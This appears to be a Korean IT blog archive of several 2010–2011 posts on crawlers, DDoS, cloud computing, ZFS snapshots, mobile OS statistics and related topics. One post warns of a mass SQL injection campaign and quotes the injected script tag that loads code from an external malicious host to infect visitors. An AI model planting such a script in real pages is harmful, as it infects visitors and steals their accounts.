IT이야기2011. 3. 24. 21:20

그 때는 검색봇 이름이 'pirs'과 'pirst'였다. 그런데, 3일전에 'first'로 비슷하게 이름이 바뀌어서 접속을 했다. 기존에 User-Agent명으로 차단을 시켜두었다. 하지만, 이를 비켜간 'first'는 마구 긁어가기 시작했다. 몇 시간뒤에 차단 조치를 취하고(개인정보를 취급하지 않는 사이트임), 얼마동안 페이지를 긁어가는지 확인했다. 48시간 가까이 긁어갔다. 포털, 구글의 봇보다 무섭다.

  • 사이트 운영자들은 봇이름으로 차단하는 경우가 많다. 그런데, 이름을 바꾸면 문제가 있지 않겠는가? 예를 들어 구글이나 네이버, 다음의 봇 이름이 바뀐다고 생각해봐라.
  • 여전히 robots.txt는 읽지 않았다. KISA의 공지와는 다르게 검색 규칙을 따르지 않는 것이다.
  • 과거에 긁어간 적이 있는 사이트는 페이지 목록이 DB화되어 있는 건가? 차단을 해도 여전히 여러 페이지를 읽어갔다.
  • referer는 http://www.pirst.kr:6600/RS/PIRST_FAQ.jsp 로 남았다.
  • IP대역은 61.111.15.110~61.111.15.119까지 총 10개이다. 이전의 IP 대역과 비슷하고, 검색 서버의 대수는 동일했다. KISA 모니터링 시스템에 대해서는 'KISA의 '개인정보 모니터링 시스템'에서 확인할 수 있다.

[ referer에 남겨진 http://www.pirst.kr:6600/RS/PIRST_FAQ.jsp 페이지의 공지 내용 ]


사이트 운영자에게 대상 사이트임을 먼저 알리는게 우선이지, 먼저 긁어가고 불편하면 메일로 문의를 하라는 것은 순서가 바뀌것 아닌가? 요즘 개인정보노출에 대한 문제가 많다. 그래서 KISA의 취지를 이해하고, 취지도 좋다고 본다. 하지만, 좋지 않은 인상을 남기는 안타까운 순간이다.
Posted by 좋은진호
IT이야기2011. 2. 1. 09:01
이집트 민주화시위로 인해 이집트 정부는 인터넷을 차단했다.


집권세력들이 자기 잘 못은 생각하지 않고, 국민의 입을 막겠다? 표현의 자유를 없애겠다? 온라인상으로 표현할 공간이 없을수록, 국민들에게 남은 선택은 한가지 밖에 없다. 더 격렬하게 시위하여 자신들의 의사를 표현하는 것 뿐이다.
집권세력은 더욱 힘을 잃고 있다. 내부적으로는 국민들의 격렬한 저항을 받아야 한다. 외부적으로는 다른 국가들의 압박을 받아야 한다. 전세계 네티즌으로부터는 비난을 받을 것이다. 샌드위치로 눌리는 집권세력들. 그들이 보기엔 사방이 적이다. 그러나 생각해보면 잘못을 뉘우칠 수 있는 희망의 손길이다.

그건 그렇고, 실제 인터넷이 차단되었는지 .eg 도메인으로 접속시도를 해봤다. 아~ 접속이 되지 않았다. ㅠ.ㅠ

1. 구글에서 site:gov.eg 를 검색해서 적당한 도메인을 고른다.
2. 그 후 dig으로 lookup해보면 도메인을 찾지 못한다. 물론 사이트 접속도 안된다.

$ dig nosi.gov.eg

; <<>> DiG 9.7.1-P2 <<>> nosi.gov.eg
;; global options: +cmd
;; connection timed out; no servers could be reached

$ dig nosi.gov.eg +trace

; <<>> DiG 9.7.1-P2 <<>> nosi.gov.eg +trace
;; global options: +cmd
.            349239    IN    NS    c.root-servers.net.
.            349239    IN    NS    a.root-servers.net.
.            349239    IN    NS    i.root-servers.net.
.            349239    IN    NS    d.root-servers.net.
.            349239    IN    NS    f.root-servers.net.
.            349239    IN    NS    h.root-servers.net.
.            349239    IN    NS    j.root-servers.net.
.            349239    IN    NS    g.root-servers.net.
.            349239    IN    NS    b.root-servers.net.
.            349239    IN    NS    k.root-servers.net.
.            349239    IN    NS    e.root-servers.net.
.            349239    IN    NS    m.root-servers.net.
.            349239    IN    NS    l.root-servers.net.
;; Received 228 bytes from 8.8.8.8#53(8.8.8.8) in 137 ms

eg.            172800    IN    NS    ns5.univie.ac.at.
eg.            172800    IN    NS    frcu.eun.eg.
eg.            172800    IN    NS    rip.psg.com.
;; Received 183 bytes from 192.228.79.201#53(b.root-servers.net) in 215 ms

nosi.gov.eg.        86400    IN    NS    NS2.STARNET.COM.eg.
nosi.gov.eg.        86400    IN    NS    NS1.RAYATELECOM.COM.
;; Received 92 bytes from 147.28.0.39#53(rip.psg.com) in 224 ms

;; connection timed out; no servers could be reached

$ dig eeaa.gov.eg +trace

; <<>> DiG 9.7.1-P2 <<>> eeaa.gov.eg +trace
;; global options: +cmd
.            349523    IN    NS    j.root-servers.net.
.            349523    IN    NS    l.root-servers.net.
.            349523    IN    NS    k.root-servers.net.
.            349523    IN    NS    i.root-servers.net.
.            349523    IN    NS    d.root-servers.net.
.            349523    IN    NS    a.root-servers.net.
.            349523    IN    NS    f.root-servers.net.
.            349523    IN    NS    e.root-servers.net.
.            349523    IN    NS    b.root-servers.net.
.            349523    IN    NS    m.root-servers.net.
.            349523    IN    NS    h.root-servers.net.
.            349523    IN    NS    c.root-servers.net.
.            349523    IN    NS    g.root-servers.net.
;; Received 228 bytes from 8.8.8.8#53(8.8.8.8) in 129 ms

eg.            172800    IN    NS    frcu.eun.eg.
eg.            172800    IN    NS    ns5.univie.ac.at.
eg.            172800    IN    NS    rip.psg.com.
;; Received 183 bytes from 128.8.10.90#53(d.root-servers.net) in 272 ms

gov.eg.            86400    IN    NS    NS.IDSC.gov.eg.
gov.eg.            86400    IN    NS    FRCU.EUN.eg.
gov.eg.            86400    IN    NS    RIP.PSG.COM.
;; Received 131 bytes from 193.171.255.77#53(ns5.univie.ac.at) in 319 ms

eeaa.gov.eg.        86400    IN    NS    NS1.TEDATA.NET.
eeaa.gov.eg.        86400    IN    NS    NS2.TEDATA.NET.
;; Received 75 bytes from 147.28.0.39#53(RIP.PSG.COM) in 214 ms

;; connection timed out; no servers could be reached


Posted by 좋은진호
IT이야기2011. 1. 20. 22:48
DDoS공격은 꾸준했지만, 최근 12월과 1월에 DDoS 공격량이 증가하고, 공격도 심해졌다는 얘기를 한다.

최근 몇몇 업체가 DDos공격을 받았다. 이들 업체도 DDoS 공격 피해자인데, 고객들에게 그것도 못 막냐~라는 얘기를 듣게 되고, 고객에게 미안한 마음까지 생긴다. 하지만 이들 업체가 노력하지 않아서 못 막는게 아니다. 차단위한 인프라 구축에도 한계가 있다. 만약 50G, 아니 100G가 들어온다면 일반적인 국내 환경에서 이 트래픽을 감당할 인프라를 갖춘 곳이 얼마나 되겠는가.

1. 폭우가 쏟아져 상류댐에서 대량의 물을 방류하게 되면 하류에서는 대비를 하더라도 피해를 입을 수밖에 없다.

이런 경우 해결할 방법은 상류댐(IDC나 연동망 등)에서 물길을 막아주는 것 밖에 없다.(이를 IP null routing이라고 한다. 공격받는 IP로 들어오는 트래픽을 상단에서 버리는 것이다.) 그러나 이 댐은 특이해서 물을 한방울도 흘러보내지 않거나 대량의 물을 그대로 방류하거나 둘중 하나만 선택할 수 있다. 어쩔 수 없이 물을 한방울도 흘러보내지 않는 것을 선택하게 된다. 대량의 물은 막았지만 식수난을 겪게 된다. (IP null routing을 하게 되면 공격 트래픽은 막아지지만 해당 IP로는 서비스를 할 수 없다. 인프라는 보호했지만 서비스는 못하는 현실)

DDoS

[ 이미지 출처 : 구글 이미지 검색 -> make.to ]


※ DDoS공격 유형은 여러가지가 있는데, 위는 UDP유형으로 대역폭을 초과하는 공격을 예로 든 것이다.
※ DDoS공격은 유형에 따라 차단할 수 있다. 그리고, 인프라를 초과하더라도 상단과의 협조와 내부 DDos방어장비를 이용해 단계별 처리로 피해를 줄일 수 있다. 먼저 DDoS방어장비 구축과 인프라 개선은 해야하는 것은 당연하다.


2. 최근 공격량이 증가했다는 것은 좀비 PC가 늘었다는 이야기가 된다. '선' 좀비 PC 구축 -> '후' DDoS공격의 형태이기 때문이다.

'하우리의 맞춤전용백신 목록'에서도 Trojan/DDoSAgent 전용백신이 작년 11월부터 증가했다. 좀비 PC도 늘어 났다는 것이다.
인터넷침해대응센터(KRCERT)의 보안공지( http://www.krcert.or.kr/ )를 보면 12월말부터 국내 주요 오픈소스 게시판의 취약점이 줄줄이 발표되었다. (당시 대량의 서버에 설치된 제로보드를 자동 패치하느라 고생한 커피닉스 분이 생각난다. ^^) 이들 3개 게시판이면 국내 공개 게시판의 대부분을 커버한다고 보면 된다.
취약점을 이용해 악성코드만 심으면, 공장에서 찍어내듯 좀비 PC를 만들 수 있는 대량 양산 체제를 구축한 것이다. 밤낮이 필요없는 24시간 양산 체제. 게시판 사용하는 사이트는 널려있으니, 악의적인 사람 입장에서는 원감절감(노력절감) 체제. 우리 나라 좀비 PC들은 네트웍도 빵빵하고, 성능은 날아다닌다. 그만큼 막강한 공격력을 자랑(?)하게 된다.

[ 인터넷침해대응센터(KRCERT)의 보안공지 ]


* 국내 공개 웹 게시판(제로보드) 취약점 주의 (2010/12/21)

  o 국내 PHP 기반의 공개 웹 게시판 제로보드에서 XSS, CSRF 및 RFI 취약점이 발견됨[1, 2]
  o 해당 취약점을 이용한 홈페이지 변조 및 원격 실행 위협이 발생함에 따라, 취약한 버전 사용자의 주의 및 조속한 패치가 요구됨

* 국내 공개 웹 게시판(테크노트) 취약점 주의 (2011/01/06)

  o 국내 PHP기반의 공개 웹 게시판인 테크노트에서 SQL인젝션 취약점이 발견됨 [1]
  o 취약한 버전을 사용하고 있을 경우, 홈페이지 해킹에 의한 내부정보(개인정보 등)유출 등의 피해를 입을 수 있으므로 웹 관리자의 적극적인 조치 필요

* 국내 공개 웹 게시판(그누보드) 취약점 주의 (2011/01/07)

  o 국내 PHP기반의 공개 웹 게시판인 그누보드에서 XSS, CSRF 취약점이 발견됨[1]
  o 취약한 버전을 사용하고 있을 경우, 홈페이지 해킹에 의한 관리자 계정 탈취 및 악성코드 유포지로 악용되는 등의 피해를 입을 수 있으므로 웹 관리자의 적극적인 조치 필요

게시판 취약점 이용한 악성코드 심기, 유명사이트 해킹으로 악성코드 심기, 웹브라우저의 zeroday취약점 등으로 좀비 PC 양산체제 구축은 꾸준할 것이다. DDoS공격 증가와 좀비 PC 양산체제 여건 마련은 무관하지 않다.

PC점검 철저히 하시라. 그리고 IE에만 의존하지 말고, 파이어폭스나 크롬 등도 이용하시라.
내가 이용자이면서 그들에게 공격자일 수도 있다. 누구를 욕할 처지가 아닐 수 있다.
Posted by 좋은진호
IT이야기2010. 12. 16. 21:31
아마존(Amazon)은 고객이 필요한 만큼의 자원만 할당 받아 서버를 이용할 수 있는 아마존 웹서비스(Amazon Web Services, AWS)중 EC2(Amazon Elastic Compute Cloud) 서비스를 제공한다. 클라우드 컴퓨팅 시스템을 이야기할 때 절대 빠질 수 없는 대표적 클라우드 서비스이다.

amazon AWS

아마존 EC2가 무엇인지 들어본적이 없다면, 뷔페를 생각하면 이해가 쉬울 것 같다. 먹을 만큼만 먹고, 필요하면 쉽게 더 덜어먹을 수 있는 뷔페. EC2는 필요한 만큼 서버 자원을 할당받고, 더 필요시 비용을 지불하면 쉽게 자원을 더 할당받아 늘릴 수 있다. 위키리크스(WikiLeaks)도 아마존에서 쫓겨나기 전까지는 EC2 서비스를 이용했었다.

이 서비스를 위해 구성된 아마존의 EC2 Cluster가 세계 슈퍼컴 TOP 500중에서 231위를 차지(2010년 11월 발표기준)했다.

[ 세계 슈퍼컴 TOP 500 중 Amazon EC2 Cluster 순위(2010년 11월) ]


  • 시스템명 : Amazon EC2 Cluster Compute Instances - Amazon EC2 Cluster
  • 환경 : Xeon X5570 2.95 Ghz, 10G Ethernet
  • 프로세서 : 7040 cores
  • 성능 : 41.82 teraflops

이 클러스터는 총 880대로 구성되었다. 위에 표시된 Xeon X5570 CPU는 네할렘(Nehalem) 쿼드코어(Quad Core) CPU이다. 그래서, 위에 표시된 총 코어수는 다음과 같이 계산이 된다.

4 cores(Xeon X5570) X 서버당 CPU 2개 X 880대 = 7040 cores

Amazon EC2 Cluster가 2010년 6월 순위에는 포함되어 있지 않지만, 성능을 그 때 기준과 비교하면 슈퍼컴 TOP 500 중 146위정도였다.

[ 2010년 6월 세계 슈퍼컴 TOP 500 ]


우리가 사용하는 일반 웹서비스가 슈퍼컴 500위 안에 들다니? 클라우드 컴퓨팅 시대에는 누구나 슈퍼컴의 일부를 할당받아 쓰는 시대가 되었다.

Posted by 좋은진호
IT이야기2010. 12. 7. 18:34
구글 캘린더에서는 정상적으로 보인다. 하지만 캘린더 공유용 웹페이지에서는 비정상적으로 날짜가 당겨서 보인다. 지난주부터 문제가 생긴 것 같다. OS와 브라우저별로 확인한 결과, 리눅스 파이어폭스에서만 날짜가 당겨져 보였다.

  • Windows IE8, 파이어폭스, 크롬, 사파리에서 정상 표시
  • 리눅스 오페라에서 정상 표시
  • 리눅스 파이어폭스(3.6.x)에서 비정상 표시

[ 정상적으로 보이는 구글 캘린더 ]



[ 웹공유 페이지에서 날짜가 당겨져서 보이는 구글 캘린더 ]


IT일정 공유하는 커피닉스'캔커피'( http://can.coffeenix.net/ )에서 살펴본 것이다. EMC Effect Day는 12월 9일, Wine 1.2.2 Released는 12월 3일로 표시되어야 맞다. 하지만 모두 이틀씩 당겨서 보인다.

Posted by 좋은진호
IT이야기2010. 12. 1. 23:27
Pingdom 블로그의 'Mobile OS usage splits the world (chart)' 글에 따르면 전세계 모바일OS별 이용률에서 아이폰은 북미, 유럽, 오세아니아 등 선진국이 많은 지역에서 앞선다. 반면, 노키아의 심비안OS는 아프리아, 아시아, 남미 등 개발도상국, 후진국이 많은 곳에서 비율이 높다. 그리고, 안드로이드가 아이폰의 비율을 점점 갉아먹으면서 비율이 높아지고 있다.

심비안 OS  31.93%
iOS           21.94%
블랙베리    19.25%
안드로이드 11.61%

이 자료는 StatCounter( http://gs.statcounter.com/ )의 통계를 기반으로 했다. 이 통계자료의 진정한 가치는 통계 수치보다는 비율의 변화에 있다.

전세계 모바일OS별 웹이용률

[ 전세계 모바일OS별 웹이용률. 출처 : StatCounter ]


한가지 흥미로운 통계는 국가별로 안드로이드 OS의 웹이용률이 50%가 넘는 나라는 우리나라 밖에 없다. 다른 나라와 극명하게 차이가 날 정도로 절대적인 1위를 차지하고 있다. 이게 바로 170만의 갤럭시S의 힘. 삼성의 힘이라고 보면 될 것 같다.

 1. South Korea, 78.3% (오늘 현재 통계는 81.93%)
 2. Austria, 27.3%
 3. Taiwan, 26.5%
 4. Denmark, 25.3%
 5. Slovenia, 24.0%
 6. United States, 23.3%
 7. Netherlands, 21.7%
 8. Sweden, 21.3%
 9. Estonia, 16.8%
10. Norway, 16.0%

우리나라의 모바일OS별 웹이용률 통계다. 안드로이드 81.93%, 아이폰 14.59%.

[ 우리나라의 모바일OS별 웹이용률. 출처 : StatCounter ]


한편 최근에 발표된 11월중순까지의 국내 스마트폰 가입자는 602만명이며, 이중에 안드로이드가 354만명, iOS가 162만명이다. 각각 58.6%, 26.9%를 차지한다.

[ 가입자 통계 출처 : 국내 스마트폰OS 시장, 안드로이드 '1위'(전자신문, 2010.11.30) ]


국내 안드로이드 가입자 비율이 58%인데, 웹이용률은 78.3%로 더 높다는 것은 2가지로 생각해볼 수 있을 것 같다. 첫째는 안드로이드 유저의 모바일웹 이용률이 더 높다는 것이다. 두번째는 이 통계가 전체 인터넷 이용률이 아닌 웹페이지 이용률이므로, 스마트폰 OS별로 유저의 인터넷 이용 성향의 차이가 있다는 것이다.

Posted by 좋은진호
IT이야기2010. 9. 14. 12:30
ZFS 파일시스템은 snapshot(스냅샷) 기능을 제공하여, 원하면 언제든지 snapshot시점으로 복원할 수 있다. 명령어 한줄로 snapshot을 만들고, 명령어 한줄로 복원한다. snapshot 생성을 매일 1회 이상 자동으로 실행되도록 해주면, 데이터 복원에 유용할 것이다.

ZFS 파일시스템

참고로 FreeBSD 8.0은 ZFS v13을, 8.1은 v14를 지원한다. FreeBSD 8.2 또는 9.0에서는 v15를 지원할 예정이다. ZFS v15는 Solaris 10 update 8과 FreeBSD간의 호환성이 좋아졌으며, ZFS파일시스템에 php 코드가 있을 경우에 기존보다 15~20%정도 RPS가 향상되었다.

이 글은 FreeBSD에서 ZFS파일시스템을 운영한 것을 토대로 작성했지만 OS와 상관없이 ZFS파일시스템이라면 동일하게 적용된다.

1. snapshot 만들기

이론적으로 snapshot은 최대 2의 64제곱개까지 만들 수 있다. snapshot은 같은 스토리지 풀(파일시스템, 볼륨)의 공간을 사용한다.

snapshot을 만들어보자. snapshot시에 형식은 '파일시스템@snapshot명' 또는 '볼륨@snapshot명'이다. snapshot 이름은 기존 이름과 중복되지 않으면 임의로 만들면 된다.

# zfs snapshot data/log@2010_0621_1740_Mon

snapshot이름은 개인적으로 '년월일' 형식을 선호한다. snapshot 목록을 볼 때, 별도 속성 옵션(-o creation)을 줘야 생성일자를 볼 수 있는 불편함 때문이다. 좀 더 직관적으로 표기하기위해 요일까지 붙여줘도 좋다.

2. snapshot 확인하기

생성된 snapshot 목록을 살펴보자. 생성일시를 알고 싶다면 -o creation의 추가 옵션이 필요하다.

# zfs list -t snapshot
NAME                          USED  AVAIL  REFER  MOUNTPOINT
... 생략 ...
 data/log@2010_0619_0701_Sat   26K      -  20.9M  -
 data/log@2010_0620_0701_Sun   30K      -  21.5M  -
 data/log@2010_0621_0701_Mon   31K      -  21.5M  -
 data/log@2010_0621_1740_Mon     0      -  28.5M  -

3. snapshot rollback하기

rollback은 snapshot 방법과 동일하다. 특정 시점으로 되돌리고 싶으면 해당 'snapshot명'을 지정하기만 하면 된다.

# zfs rollback data/log@2010_0621_1740_Mon
cannot rollback to 'data/log@2010_0621_1740_Mon': more recent snapshots exist
use '-r' to force deletion of the following snapshots:
data/log@2010_0621_1750_Mon
data/log@2010_0621_1813_Mon

위의 경우는 data/log@2010_0621_1740_Mon 스냅샷 이후(즉, 보다 최근)에 2개의 스냅샷이 존재하기 때문에 나오는 메시지이다. 이를 무시하고 롤백하려면 -r 옵션(Recursively)을 주면 된다.

# zfs rollback -r data/log@2010_0621_1740_Mon

※ 여기서는 snapshot 생성, 확인, 복원에 대해 간단하게 적었으며, 자세한 글은 '커피닉스(coffeenix.net)'에 올려뒀다.

* 관련글
2009/02/26 - [시스템이야기] - FreeBSD 7에서 ZFS 사용 (유연성은 좋으나, 성능은 불만족)

Posted by 좋은진호
IT이야기2010. 6. 30. 23:25
Datacenter Knowledge의 Rich Miller 글 'Facebook Server Count: 60,000 or More'에서 Facebook의 서버 대수는 6만대 이상일 것으로 추측하고 있다.

지난주에 있었던 Velocity 2010 컨퍼런스에서 Facebook의 'Tom Cook'의 프리젠테이션 자료를 토대로 서버 대수를 추측했다. 프리젠테이션에 포함된 차트에는 년도는 있지만, 서버 대수에 대한 수치는 없다. 그러나 이 차트의 성장 곡선의 비율로 대수를 할 수 있다.
facebook server footprint

[ Facebook 서버 증가 차트 ]


2009년 11월 Facebook의 CTO인 Jeff Rothschild(제프 로스차일드)은 서버가 3만대 이상이라고 밝혔다. 차트에서 2009년 후반에 있는 평평한 지점이 대략 이 3만대 이상이 되는 지점일 것이다. 그러면 차트 맨 오른쪽 2010년 초에는 그 때의 두배 정도 되므로, 서버 대수는 6만대 이상으로 추측이 가능하다. Facebook의 이용규모에 비해서는 서버 대수가 생각보다는 적다는 느낌이다. Memcached, HipHop(PHP를 C++로 변환하여 성능 개선), Varnish(분산 및 캐싱 웹서버), Cassandra(NoSQL) 등의 효율적인 운영 덕분일까?

[ 현재 운영중인 Facebook의 Data Center 내부 ]


[ 현재 운영중인 Facebook의 Data Center 내부 (랙에 장착된 서버 뒷면. 케이블링이 깔끔하다.) ]


[ 현재 운영중인 Facebook의 Data Center 내부 ]

※ 위 이미지 출처 : Datacenter Knowledge 블로그 등

Facebook유저는 작년 1월에 1억 5천명이었는데, 올해 2월에는 2배가 넘는 4억명으로 급성장했다. 이렇게 급성장하는 서비스를 대비하여 Facebook은 Facebook 최초의 자체 데이터 센터를 Prineville에 건설중이다. 규모는 147,000 Square Foot(SF, 약 13,600여 제곱미터). FIFA의 국제규격 축구장 넓이가 7140제곱미터 이니깐, 축구장 2배 정도의 규모라고 보면 된다. 건설 사진은 Facebook에 공개되어 있다.

Facebook의 Prineville Data Center

[ Facebook의 Prineville Data Center 조감도 ]

※ 이미지 출처 : Facebook 공식 블로그 'Breaking Ground on Our First Custom Data Center'


소셜미디어의 성장이 놀랍다.
그런데, 트위터는 몇 대일까?


* 서버대수 관련글

- Facebook 사용자 4억명 돌파, 그리고 서버수 (2010.2.12)
- 2009/06/01 - [IT이야기] 해외 주요 업체의 서버 대수는?

* 데이터센터 관련글

- 2011/04/20 - [IT이야기] Facebook의 데이터센터와 서버
- 2009/10/07 - [IT이야기] MS의 시카고 데이터센터 사진 공개
- 2009/04/03 - [IT이야기] 구글 데이터 센터 내부 공개, 그 안을 들여다보자
- 2009/04/10 - [IT이야기] 구글, 구글 서버와 데이터센터 발표자료를 풀 동영상으로 공개
- 구글 데이터센터의 놀라운 전력 효율 (2009.10.27)
- 애플 신규 데이터센터 (2009.7.16)
- 애플 신규 데이터센터 (2009.8.14)
- 터키 이스탄불의 Vodafone 데이터센터, 폭우로 물에 잠겨 (2009.9.16)

Posted by 좋은진호
IT이야기2010. 6. 16. 18:43
최근 월스트리트 저널(online.wsj.com)등을 포함한 MS IIS 서버와 ASP.net환경의 서버에 대량 SQL Injection(Mass SQL Injection) 공격이 이뤄지고 있으니 주의가 필요하다.

해킹된 사이트에는 _script src=http://ww.robint.us/u.js_ 스크립트가 삽입이 되었다. 그 이후에 2677.in/yahoo.js, 4589.in/yahoo.js 등의 도메인으로 스크립트를 삽입하고 있다. 최근 Adobe Flash 0-day 취약점(CVE-2010-1297)이 발생했다. 이 취약점을 패치하지 않은 유저가 해킹된 사이트를 방문하면 악성코드에 감염이 된다. Armorize Blog(상세한 분석 자료 있음)에 따르면 이 악성코드는 다음 3개 게임 사이트의 게임 계정을 가로채는 것으로 알려졌다.
 
aion.plaync.co.kr
aion.plaync.jp
df.nexon.com

구글에서 2677.in/yahoo.js 또는 4589.in/yahoo.js를 검색하면, 프레시안(현재는 정상 복구된 것으로 보임), 한국표준협회, 아산시 평생학습센터 등 다수의 국내 사이트들이 감염된 것을 확인할 수 있다.

[ 구글에서 '2677.in/yahoo.js' 검색 결과 ]


유저들은 KrCERT의 권고문을 살펴보고, 반드시 Adobe Flash Player(http://get.adobe.com/flashplayer/)를 업데이트해야 한다.

마지막으로 위 도메인의 등록정보를 살펴보자. 3개 모두 중국(CN)에서 등록을 했다. 등록일이 얼마되지 않았다. 스크립를 호스팅하기 위해 생성한 도메인이라는 것을 뜻한다. 그리고, 도메인이 차단될 경우에 유사 도메인으로 계속 등록을 시도할 가능성이 커보인다.

1. robint.us
   Domain Registration Date:                    Sun Mar 14 05:28:08 GMT 2010
   Domain Last Updated Date:                    Tue Jun 08 05:10:09 GMT 2010

2. 2677.in
   Created On:10-Jun-2010 10:33:51 UTC
   Last Updated On:12-Jun-2010 15:59:46 UTC

3. 4589.in
   Created On:13-Jun-2010 08:13:07 UTC
   Last Updated On:13-Jun-2010 08:13:08 UTC


* 관련 정보

  - Mass infection of IIS/ASP sites - robint.us
  - Mass infection of IIS/ASP sites - 2677.in/yahoo.js
  - 대량 SQL Injection 공격 주의 (2009.12월)
Posted by 좋은진호
IT이야기2010. 6. 12. 00:05
'하테나' 블로그('휴대폰으로 농산물을 키우는 Hatakeppi') 에 따르면 일본에서 휴대폰게임으로 농산물을 키우고, 키운 농산물을 농가로 부터 직접 받아 볼 수 있는 Hatakeppi 게임이 등장했다.

Hatakeppi

[ 일본 휴대폰 게임, Hatakeppi ]


온라인 세계와 현실 세계가 연결되어 있다는 착각이 드는 게임이다. 이는 다음과 같은 '현실과 가상의 경계 허물기', '온/오프라인의 조합(온/오픈라인의 연계)'의 흐름을 따른 것이라고 봐도 될 것이다.

  • 요즘 스마트폰으로 인해 화두가 되고 있는 '증강현실'(현실세계에 가상세계를 조합)
  • 증강가상 (반대로 가상세계에 현실세계를 조합)
  • SNS에서 구축한 인맥을 오프라인의 모임, 만남으로 이뤄지는 현상

이 게임을 좀 더 살펴보면 '전국농업청년클럽연락협의회'와 협력하여 게임에서 키운 농산물을 유기농 야채로 받아볼 수 이게 유통망이 구축되어 있다. '게임유저'는 농작물 재배를 배우며, 신선한 농작물 직접 받아 볼 수 있고, '농가'는 직거래할 수 있는 색다른 판로가 생기는 장점이 있다.

Hatakeppi

[ Hatakeppi의 게임 개념 ]


Hatakeppi

[ Hatakeppi 게임 ]


그리고, 현실 1년 = 가상 23일로 시간적으로 축소되어 있다. 농작물이 쑥쑥 자라는 모습 빨리 볼 수 있으므로 현실에서 빨리 받아볼 수 있는 기쁨 또한 빨리 찾아올 것이다.

하테케피(Hatakeppi) 게임의 '사업 모델'은 2005년 시작한 미국의 '웹킨즈(Webkinz)'의 모델과 비슷한 점이 있다.
(Hatakeppi는 농사 체험 교육, Webkinz는 어린이들을 위한 교육이 있으나 이 글의 주제가 아니므로 생략한다.)

[ Webkinz ]


2008년 크리스마스 아침에 수백만 미국 가정의 나무 밑에는 동물 인형이 놓여 있었다. 그 인형에는 코드(Secret Code)가 적힌 태그가 달려 있었다. 이 코드를 이용해 온라인 게임에 접속하면, 그 인형의 가상 애완동물과 만날 수 있도록 되어 있다. 이 게임에서 가상 애완동물을 더 가질 수 있는 방법은 단 한가지. 현실에서 동물인형을 구매하는 것. 이로 인해 '웹킨즈'는 현실의 동물 인형과 가상의 애완 동물을 연결하므로써 미국 제 1의 장난감 회사로까지 부상했다.

※ 'Webkinz 사례'와 '온/오프라인 혼합 비즈니스 모델'에 대해서는 책 'Free'(p240~)에 소개되어 있으니 참고할 것.

온라인(휴대폰) -> 오프라인으로 혼합(가상 농산물이 현실세계로 배송)된 Hatakeppi, 오프라인 -> 온라인으로 혼합(현실 동물인형이 가상 애완동물)된 Webkinz는 새롭게 시도해볼 수 있는 비즈니스 모델이다.

  • 온라인에서 1주간 키운 병아리가 현실에서 '치킨'으로 배달된다면? (잘 키우느냐에 따라 맥주는 서비스)
  • 온라인에서 키운 강아지를 한달 뒤에 오프라인에서 받아 볼 수 있다면?
  • 온라인에서 키운 애벌레가 '장수풍뎅이'가 되어 현실의 아이에게 선물해 줄 수 있다면?


Posted by 좋은진호